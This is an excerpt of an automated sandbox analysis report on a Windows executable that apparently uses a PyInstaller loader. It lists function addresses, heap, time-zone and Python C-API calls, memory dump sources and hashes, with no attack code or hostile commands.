                                                                                                                                                                                                                                                    Function 00007FF69F406F84 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3FC90C: HeapAlloc.KERNEL32(?,?,?,00007FF69F3EFFB0,?,?,?,00007FF69F3F161A,?,?,?,?,?,00007FF69F3F2E09), ref: 00007FF69F3FC94A
                                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF69F40274B,?,?,?,00007FF69F3F9267,?,?,?,00007FF69F3F915D,?,?,?,00007FF69F3F953E), ref: 00007FF69F406FF1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2177240990-0
                                                                                                                                                                                                                                                    • Opcode ID: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                                                    • Instruction ID: ac42cb132212f8892b3f9cc4d8777dfeb74302f11750a0a779b0f2ba673e30ed
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0016D10E1C24780FFB86A62A9406791390CFA4FE8F1E42B4E92ECE2C3FDACE5445741
                                                                                                                                                                                                                                                    Function 00007FF69F3F7548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                                                    • Instruction ID: 6b6a16ccde6b7d30f9a446ec92e8c8be17ecf056ded286b7172fdcece616bba5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7EE0EC90E0834B43FAB47AE989822B92310DF64350F9240B9D91C8E283DD1C78A5B6A1
                                                                                                                                                                                                                                                    Function 00007FF69F3FDEA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF69F3FA63A,?,?,?,00007FF69F3F43FD,?,?,?,?,00007FF69F3F979A), ref: 00007FF69F3FDEFD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                    • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                                                    • Instruction ID: 1f33d22512596faf48a82919390567d93185c56738ebc03898cc1e0471fd82ea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AF09005B0934781FEB85762A8197B52390DFA8B90F5E40B8CD0ECE3D2DE6CE4819350
                                                                                                                                                                                                                                                    Function 00007FF69F3FC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF69F3EFFB0,?,?,?,00007FF69F3F161A,?,?,?,?,?,00007FF69F3F2E09), ref: 00007FF69F3FC94A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                    • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                    • Instruction ID: 252553d1956ab2490058a880320a6a5c38a52d528f7e6b5eacfca2082c60b50f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAF08201F59247C5FEB8567158117761380DF54BF0F0B07B8DC2EC92C2DE6CE641A290

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FF69F3EC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                    • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                                                    • Instruction ID: a7c7cf45f6d53c220520048a24627f07498a3b5597147d979a78632f3d57aae4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38312772608A8286EB708F60E8843FE6360FB94748F05443ADA4E87B99DF7CD548CB14
                                                                                                                                                                                                                                                    Function 00007FF69F3E29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                                                    • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                                                    • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                                                    • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                                                    • Instruction ID: 0cc22093bb48e715237c51b7900044598eec71fdd7e8c66f3de15d83543226f7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A219132608B8282E7309B10F4406EA73A4FB98B84F400136EBCD93B99DF7CD646CB44
                                                                                                                                                                                                                                                    Function 00007FF69F404F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F404F55
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F4048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F4048BC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: GetLastError.KERNEL32(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C78
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF69F3F9BEF,?,?,?,?,?,00007FF69F3F9ADA), ref: 00007FF69F3F9C19
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF69F3F9BEF,?,?,?,?,?,00007FF69F3F9ADA), ref: 00007FF69F3F9C3E
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F404F44
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F404908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F40491C
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051BA
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051CB
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051DC
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69F40541C), ref: 00007FF69F405203
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4070488512-0
                                                                                                                                                                                                                                                    • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                                                    • Instruction ID: babff3fe1114e1f09b3c7e255ed922ae40d11d8b6f80e36fc38142ee0c99cdfb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AD1C136E1824286EB30AF25D8405B963A1FFA4F94F5A4075DA0DC7A97DFBCE441C780
                                                                                                                                                                                                                                                    Function 00007FF69F3F9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                                    • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                                                    • Instruction ID: d2bbecabd07a7788756b9a45af0723383e767e048e361597324700e249902bf0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4319132608B8286EB70CF25E8402AE73A4FB98B98F550179EA9D87B55DF3CC545CB40
                                                                                                                                                                                                                                                    Function 00007FF69F400B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2227656907-0
                                                                                                                                                                                                                                                    • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                                                    • Instruction ID: 8941243ebeecf13b9ee3495bf0bacb1ab684ee2c2f86ce3f2b167870db2acc03
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25B1E622B1C69281EB749B29D8005B963A1EF64FE4F4A4175EE5D8BBC6DFBCE441C340
                                                                                                                                                                                                                                                    Function 00007FF69F40518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051BA
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F404908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F40491C
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051CB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F4048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F4048BC
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051DC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F4048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F4048EC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: GetLastError.KERNEL32(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C78
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69F40541C), ref: 00007FF69F405203
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3458911817-0
                                                                                                                                                                                                                                                    • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                                                    • Instruction ID: d8726be4f7253cf78b532d76981d9f2d796e23afa3329dc72bb78157f9603ff9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C251A036A1864286E730EF21E8805B97360FF68B84F4A4179EA4DC7697DF7CE441CB80
                                                                                                                                                                                                                                                    Function 00007FF69F3E50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF69F3E5C57,?,00007FF69F3E308E), ref: 00007FF69F3E50C0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF69F3E5C57,?,00007FF69F3E308E), ref: 00007FF69F3E5101
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF69F3E5C57,?,00007FF69F3E308E), ref: 00007FF69F3E5126
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF69F3E5C57,?,00007FF69F3E308E), ref: 00007FF69F3E514B
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF69F3E5C57,?,00007FF69F3E308E), ref: 00007FF69F3E5173
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF69F3E5C57,?,00007FF69F3E308E), ref: 00007FF69F3E519B
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF69F3E5C57,?,00007FF69F3E308E), ref: 00007FF69F3E51C3
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF69F3E5C57,?,00007FF69F3E308E), ref: 00007FF69F3E51EB
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF69F3E5C57,?,00007FF69F3E308E), ref: 00007FF69F3E5213
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                    • API String ID: 190572456-2007157414
                                                                                                                                                                                                                                                    • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                                                    • Instruction ID: 7d49364290ca3f6819ce48d3c7f9311d75cab66f48d7a105e0e927d40e3b05bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
